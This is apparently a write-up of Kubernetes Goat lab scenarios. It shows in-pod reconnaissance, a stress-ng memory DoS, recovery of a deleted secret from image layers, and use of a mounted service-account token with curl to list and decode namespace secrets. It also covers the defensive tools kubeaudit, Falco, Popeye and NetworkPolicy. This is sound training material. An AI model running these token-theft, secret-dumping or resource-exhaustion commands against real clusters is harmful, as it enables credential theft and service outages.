Other information gathering:

cat /proc/self/cgroup
cat /etc/hosts
# mount information
mount
# inspect the filesystem
ls -la /home/
printenv   # or simply: env

The flag is right there in the environment variables.

DoS against memory, CPU, and other resources

If the YAML that deploys a workload does not limit resource usage, an attacker may be able to consume the pod/deployment's resources and DoS the Kubernetes cluster.

Here we use the stress-ng stress-testing tool.

First check the baseline usage: CPU is at 0 and memory stays under 10 MiB:

$ docker stats --no-stream | grep hunger
842e3f0c146a k8s_hunger-check_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-4230-9265-1447b8317e0d_0 0.00% 6.609MiB / 15.64GiB 0.04% 0B / 0B 0B / 0B 8
302af9807534 k8s_POD_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-4230-9265-1447b8317e0d_0 0.00% 1.227MiB / 15.64GiB 0.01% 0B / 0B 0B / 0B 1

Run the command below to stress the pod: --vm starts 8 workers doing anonymous mmap, and --vm-bytes sets the memory each worker allocates. With 2G per worker the 16 GB of RAM was not filled (only 2-3 GB was used), so I simply raised it to 16G; --timeout stops the test after 60s.

stress-ng --vm 8 --vm-bytes 16G --timeout 60s

Below is a screenshot of htop on the node during the stress test.

Running docker stats | grep hunger on the node, after a while it stops returning results altogether.

This can leave other pods without resources to run, unable to handle user requests or painfully slow; on your own servers it burns extra electricity, and in the cloud it can produce a much larger bill.

Looking at the deployment YAML, the resource limits are commented out; that said, a 1000G limit is barely different from no limit at all.
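Defensively, limits can also be applied to the running deployment without editing files; a sketch using the names from this lab:

$ kubectl -n big-monolith set resources deployment hunger-check-deployment \
    --limits=cpu=100m,memory=128Mi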

Hacker container

kubectl run -it --rm hacker-container --image=madhuakula/hacker-container -- sh

Once the pod is up we can use amicontained to assess the container's privileges and related information:

~ # amicontained
Container Runtime: docker
Has Namespaces:
        pid: true
        user: false
AppArmor Profile: docker-default (enforce)
Capabilities:
        BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (22):
        MSGRCV SYSLOG SETSID VHANGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE KEXEC_LOAD PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE KEXEC_FILE_LOAD
Looking for Docker.sock

We can also use the bundled nikto for web vulnerability scanning, though the results look unimpressive:

~ # nikto.pl -host http://metadata-db
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.105.74.206
+ Target Hostname: metadata-db
+ Target Port: 80
+ Start Time: 2022-06-22 08:20:04 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7373 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2022-06-22 08:21:53 (GMT0) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Information hidden in image layers

With Docker images it is all too easy for passwords, private keys, tokens, and the like to end up baked into the image.

The author ships a hidden-in-layers job:

$ kubectl get jobs
NAME COMPLETIONS DURATION AGE
batch-check-job 1/1 36s 6d5h
hidden-in-layers 0/1 6d5h 6d5h
kube-bench-node 1/1 29s 46h

Check the deployment file to confirm the image name:

$ cat ~/kubernetes-goat/scenarios/hidden-in-layers/deployment.yaml | grep image
image: madhuakula/k8s-goat-hidden-in-layers

On the node, inspect the image: docker inspect shows the CMD that finally runs, but only that single command:

$ docker inspect madhuakula/k8s-goat-hidden-in-layers | grep "Cmd" -A 5
        "Cmd": null,
        "Image": "",
        "Volumes": null,
        "WorkingDir": "",
        "Entrypoint": null,
        "OnBuild": null,
--
        "Cmd": [
            "sh",
            "-c",
            "tail -f /dev/null"
        ],
        "ArgsEscaped": true,

We have already used docker history to view each layer's command. Here we can see a /root/secret.txt file that gets deleted in a later layer:

$ docker history --no-trunc madhuakula/k8s-goat-hidden-in-layers
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc75561773bd68607 5 weeks ago CMD ["sh" "-c" "tail -f /dev/null"] 0B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/contribution.txt && rm -rf /root/secret.txt # buildkit 28B buildkit.dockerfile.v0
<missing> 5 weeks ago ADD secret.txt /root/secret.txt # buildkit 41B buildkit.dockerfile.v0
<missing> 5 weeks ago LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat 0B buildkit.dockerfile.v0
<missing> 2 months ago /bin/sh -c #(nop) CMD ["/bin/sh"] 0B
<missing> 2 months ago /bin/sh -c #(nop) ADD file:5d673d25da3a14ce1f6cf66e4c7fd4f4b85a3759a9d93efb3fd9ff852b5b56e4 in / 5.57MB

There is another tool, https://hub.docker.com/r/alpine/dfimage, which is more thorough. Built on https://github.com/P3GLEG/Whaler, it can search for secret files (by saving the image to a file, extracting it, and searching the contents) and print environment variables (obtained via docker inspect). For the implementation see https://github.com/P3GLEG/Whaler/blob/master/main.go and https://github.com/P3GLEG/Whaler/blob/master/scanner.go

$ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
$ dfimage madhuakula/k8s-goat-hidden-in-layers:latest
Analyzing madhuakula/k8s-goat-hidden-in-layers:latest
Docker Version:
GraphDriver: overlay2
Environment Variables
|PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Image user
|User is root

Potential secrets:
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-5243ef4b.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-5261cecb.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-61666e3f.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/udhcpd.conf DHCP server configs dhcpd[^ ]*.conf 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
Dockerfile:
CMD ["/bin/sh"]
LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat
ADD secret.txt /root/secret.txt # buildkit
root/
root/secret.txt

RUN RUN echo "Contributed by Rewanth Cool" >> /root/contribution.txt \
&& rm -rf /root/secret.txt # buildkit
CMD ["sh" "-c" "tail -f /dev/null"]

The few lines after ADD secret.txt /root/secret.txt look a little off, but it hardly matters.

While searching for dfimage I found another GitHub project, also named dfimage, that reconstructs a Dockerfile from an image based on docker history, sparing us the manual reconstruction:

https://github.com/LanikSJ/dfimage/blob/3d55b88596d5eec8d4beff171ad5d4931043ad19/entrypoint.py#L17

In its output the FROM line is certainly wrong, and the second line does not tell us much either:

$ docker run -v /var/run/docker.sock:/var/run/docker.sock dfimage madhuakula/k8s-goat-hidden-in-layers:latest
FROM madhuakula/k8s-goat-hidden-in-layers:latest
ADD file:90e56af13188c7f0283d244a0d70b853d8bef8587a41f1da8eac3a2aba8964ef in /
CMD ["/bin/sh"]
RUN LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat
RUN ADD secret.txt /root/secret.txt # buildkit
RUN RUN /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/contribution.txt \
&& rm -rf /root/secret.txt # buildkit
RUN CMD ["sh" "-c" "tail -f /dev/null"]

But this only shows us that the file existed; we want its contents. Simply starting a container will not work, since the file has been deleted:

$ kubectl run test --rm --restart=Never -it --image=madhuakula/k8s-goat-hidden-in-layers -- sh
If you don't see a command prompt, try pressing enter.
/ # ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
/ # cd root/
~ # ls -la
total 16
drwx------ 1 root root 4096 Jun 24 08:33 .
drwxr-xr-x 1 root root 4096 Jun 24 08:29 ..
-rw------- 1 root root 19 Jun 24 08:34 .ash_history
-rw-r--r-- 1 root root 28 May 16 20:41 contribution.txt
~ #

The layer just before the deletion still has it, though. First save the whole image to a file:

# root @ nsfocus  in ~ [16:35:15]
$ mkdir hidden-in-layers
# root @ nsfocus in ~ [16:35:24]
$ docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers/hidden-in-layers.tar
# root @ nsfocus in ~ [16:35:48]
$ cd hidden-in-layers/
# root @ nsfocus in ~/hidden-in-layers [16:35:52]
$ tar -xvf hidden-in-layers.tar
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/VERSION
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/json
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/layer.tar
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/VERSION
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/json
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc75561773bd68607.json
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/VERSION
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/json
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/layer.tar
manifest.json
repositories

Three of these layers contain a layer.tar. With this few we could of course extract them one by one and hunt for secret.txt.

But there is a tool that quickly pinpoints which layer ID's layer.tar to look in: dive.

wget https://github.com/wagoodman/dive/releases/download/v0.10.0/dive_0.10.0_linux_amd64.deb
apt install ./dive_0.10.0_linux_amd64.deb

Run it:

dive madhuakula/k8s-goat-hidden-in-layers

From the screenshot below we know it is in 66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535.

Finally we recover the secret.txt file:

# root @ nsfocus  in ~/hidden-in-layers [16:39:52]
$ cd 66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:39:54]
$ ls
json layer.tar VERSION
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:39:55]
$ tar -xf ./layer.tar
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:40:05]
$ ls
json layer.tar root VERSION
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:40:07]
$ cd root/
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/root [16:40:10]
$ ls
secret.txt
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/root [16:40:12]
$ cat secret.txt
k8s-goat-3b7a7dc7f51f4014ddf3446c25f8b772

RBAC least-privilege misconfiguration

In Kubernetes' early days there was no such concept as RBAC (role-based access control); ABAC (attribute-based access control) was the norm. Today it has superpowers like RBAC to implement the security principle of least privilege. Even so, permissions are sometimes over-granted.

The challenge's goal is to find the k8svaultapikey.

By default, Kubernetes stores all tokens and service-account information under /var/run/secrets/kubernetes.io/serviceaccount/:

root@hunger-check-deployment-56d65977f6-k68g9:/# cd /var/run/secrets/kubernetes.io/serviceaccount/
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# ls -la
total 4
drwxrwxrwt 3 root root 140 Jun 24 08:50 .
drwxr-xr-x 3 root root 4096 Jun 16 02:55 ..
drwxr-xr-x 2 root root 100 Jun 24 08:50 ..2022_06_24_08_50_43.045810252
lrwxrwxrwx 1 root root 31 Jun 24 08:50 ..data -> ..2022_06_24_08_50_43.045810252
lrwxrwxrwx 1 root root 13 Jun 16 02:53 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Jun 16 02:53 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Jun 16 02:53 token -> ..data/token

Some of the paths and addresses are also present in environment variables:

root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep SERVICEACCOUNT
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep KUBERNETES_SERVICE_HOST
KUBERNETES_SERVICE_HOST=10.96.0.1
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
# the pod's namespace
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt

With these we can talk to the API server, and we also learn the server's real IP:

$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api
{
  "kind": "APIVersions",
  "versions": [
    "v1"
  ],
  "serverAddressByClientCIDRs": [
    {
      "clientCIDR": "0.0.0.0/0",
      "serverAddress": "192.168.2.174:6443"
    }
  ]
}

Querying secrets at cluster scope shows we lack permission:

$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "secrets is forbidden: User \"system:serviceaccount:big-monolith:big-monolith-sa\" cannot list resource \"secrets\" in API group \"\" at the cluster scope",
  "reason": "Forbidden",
  "details": {
    "kind": "secrets"
  },
  "code": 403
}

List the secrets in the current namespace:

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets

List the pods in the current namespace:

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/pods
$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9984    0  9984    0     0   154k      0 --:--:-- --:--:-- --:--:--  154k
        "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"k8svaultapikey\":\"azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U=\"},\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"vaultapikey\",\"namespace\":\"big-monolith\"},\"type\":\"Opaque\"}\n"
        "fieldsV1": {"f:data":{".":{},"f:k8svaultapikey":{}},"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:type":{}}
        "k8svaultapikey": "azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U="

That looks like base64:

$ echo "azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U=" | base64 -d
k8s-goat-85057846a8046a25b35f38f3a2649dce

Looking back at the deployed YAML, the Role simply grants get, watch, and list on all resources.
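kubectl auth can-i makes the over-grant easy to confirm; a sketch run with cluster-admin credentials:

$ kubectl auth can-i list secrets -n big-monolith \
    --as=system:serviceaccount:big-monolith:big-monolith-sa
yes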

KubeAudit - auditing Kubernetes clusters

kubeaudit is an open-source tool. It needs cluster administrator privileges; the tiller account has them, so the docs launch the hacker container under the tiller serviceaccount, but my cluster has no such account:

$ kubectl run -n kube-system --serviceaccount=tiller --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
Flag --serviceaccount has been deprecated, has no effect and will be removed in the future.
Error from server (Forbidden): pods "bash" is forbidden: error looking up service account kube-system/tiller: serviceaccount "tiller" not found

I find Local Mode the most convenient: download a binary straight onto the master and run it:

$ ./kubeaudit all
W0627 14:19:28.628353   95337 warnings.go:70] v1 ComponentStatus is deprecated in v1.19+
W0627 14:19:32.831222   95337 warnings.go:70] extensions/v1beta1 Ingress is deprecated in v1.14+, unavailable in v1.22+; use networking.k8s.io/v1 Ingress
W0627 14:19:33.253577   95337 warnings.go:70] policy/v1beta1 PodSecurityPolicy is deprecated in v1.21+, unavailable in v1.25+

---------------- Results for ---------------

  apiVersion: v1
  kind: Namespace
  metadata:
    name: big-monolith

--------------------------------------------

-- [error] MissingDefaultDenyIngressAndEgressNetworkPolicy
   Message: Namespace is missing a default deny ingress and egress NetworkPolicy.
   Metadata:
      Namespace: big-monolith

......
---------------- Results for ---------------

  apiVersion: apps/v1
  kind: Deployment
  metadata:
    name: hunger-check-deployment
    namespace: big-monolith

--------------------------------------------

-- [error] AppArmorAnnotationMissing
   Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hunger-check' should be added.
   Metadata:
      Container: hunger-check
      MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hunger-check

-- [error] CapabilityOrSecurityContextMissing
   Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
   Metadata:
      Container: hunger-check

-- [warning] ImageTagMissing
   Message: Image tag is missing.
   Metadata:
      Container: hunger-check

-- [warning] LimitsNotSet
   Message: Resource limits not set.
   Metadata:
      Container: hunger-check

-- [error] RunAsNonRootPSCNilCSCNil
   Message: runAsNonRoot should be set to true or runAsUser should be set to a value > 0 either in the container SecurityContext or PodSecurityContext.
   Metadata:
      Container: hunger-check

-- [error] AllowPrivilegeEscalationNil
   Message: allowPrivilegeEscalation not set which allows privilege escalation. It should be set to 'false'.
   Metadata:
      Container: hunger-check

-- [warning] PrivilegedNil
   Message: privileged is not set in container SecurityContext. Privileged defaults to 'false' but it should be explicitly set to 'false'.
   Metadata:
      Container: hunger-check

-- [error] ReadOnlyRootFilesystemNil
   Message: readOnlyRootFilesystem is not set in container SecurityContext. It should be set to 'true'.
   Metadata:
      Container: hunger-check

-- [error] SeccompAnnotationMissing
   Message: Seccomp annotation is missing. The annotation seccomp.security.alpha.kubernetes.io/pod: runtime/default should be added.
   Metadata:
      MissingAnnotation: seccomp.security.alpha.kubernetes.io/pod

......
---------------- Results for ---------------

  apiVersion: batch/v1
  kind: Job
  metadata:
    name: hidden-in-layers
    namespace: default

--------------------------------------------

-- [error] AppArmorAnnotationMissing
   Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hidden-in-layers' should be added.
   Metadata:
      Container: hidden-in-layers
      MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hidden-in-layers

-- [error] AutomountServiceAccountTokenTrueAndDefaultSA
   Message: Default service account with token mounted. automountServiceAccountToken should be set to 'false' on either the ServiceAccount or on the PodSpec or a non-default service account should be used.

-- [error] CapabilityOrSecurityContextMissing
   Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
   Metadata:
      Container: hidden-in-layers

From the results, the tool checks resource kinds such as Namespace, Deployment, DaemonSet, and Job.

Falco - runtime security monitoring and detection

Helm v3 is required; installation: https://helm.sh/docs/intro/install/

Deploy the helm chart into the Kubernetes cluster and install falco:

helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:39:48]
$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories
# root @ k8s-master in ~/kubernetes-goat/kubeaudit [14:40:12]
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
Update Complete. ⎈Happy Helming!⎈
# root @ k8s-master in ~/kubernetes-goat/kubeaudit [14:42:00]
$ helm install falco falcosecurity/falco
NAME: falco
LAST DEPLOYED: Mon Jun 27 14:50:10 2022
NAMESPACE: default
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.


Tip:
You can easily forward Falco events to Slack, Kafka, AWS Lambda and more with falcosidekick.
Full list of outputs: https://github.com/falcosecurity/charts/tree/master/falcosidekick.
You can enable its deployment with `--set falcosidekick.enabled=true` or in your values.yaml.
See: https://github.com/falcosecurity/charts/blob/master/falcosidekick/values.yaml for configuration values.

Falco can detect and alert on any behavior that involves making Linux system calls. Alerts can be triggered by the use of specific system calls, their arguments, and properties of the calling process. For example, Falco easily detects events including, but not limited to:

  • A shell running inside a container or pod in Kubernetes.
  • A container running in privileged mode, or mounting a sensitive path such as /proc.
  • An unexpected child process being spawned.
  • An unexpected read of a sensitive file such as /etc/shadow.
  • A non-device file being written to /dev.
  • A standard system binary (such as ls) making an outbound network connection.
  • A privileged pod starting in the Kubernetes cluster.

Check the status of the falco pods:

kubectl get pods --selector app=falco

Fetch the logs from the Falco system:

kubectl logs -f -l app=falco

Let's start a madhuakula/hacker-container and read the sensitive file /etc/shadow to see whether Falco notices:

kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
cat /etc/shadow
vi /etc/shadow

Because of output buffering, manually fetched logs can lag; if you want results sooner, run the command several times.

Popeye - a Kubernetes cluster sanitizer

Popeye is a utility that scans a live Kubernetes cluster and reports potential issues with deployed resources and configurations.

The issues it can detect are listed under the Sanitizers heading at https://popeyecli.io/

Download:

wget https://github.com/derailed/popeye/releases/download/v0.10.0/popeye_Linux_x86_64.tar.gz
tar -xvf popeye_Linux_x86_64.tar.gz

Just run the binary.
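For example:

$ ./popeye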

At the end it even scores your cluster.

Securing network boundaries with NSP

Create the lab environment by starting an nginx:

kubectl run --image=nginx website --labels app=website --expose --port 80

Start another pod and try to reach the nginx; it is reachable:

$ kubectl run --rm -it --image=alpine temp -- sh
If you don't see a command prompt, try pressing enter.
/ # wget -qO- http://website
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
/ #

Create a NetworkPolicy file, website-deny.yaml:

$ cat website-deny.yaml 
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: website-deny
spec:
  podSelector:
    matchLabels:
      app: website
  ingress: []
Apply the policy:

$ kubectl apply -f website-deny.yaml
networkpolicy.networking.k8s.io/website-deny created

Start a temporary pod again and test access.
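Assuming the CNI plugin enforces NetworkPolicy, the same probe should now time out; a sketch (busybox wget's -T flag sets the timeout in seconds):

$ kubectl run --rm -it --image=alpine temp -- sh
/ # wget -qO- -T 5 http://website
wget: download timed out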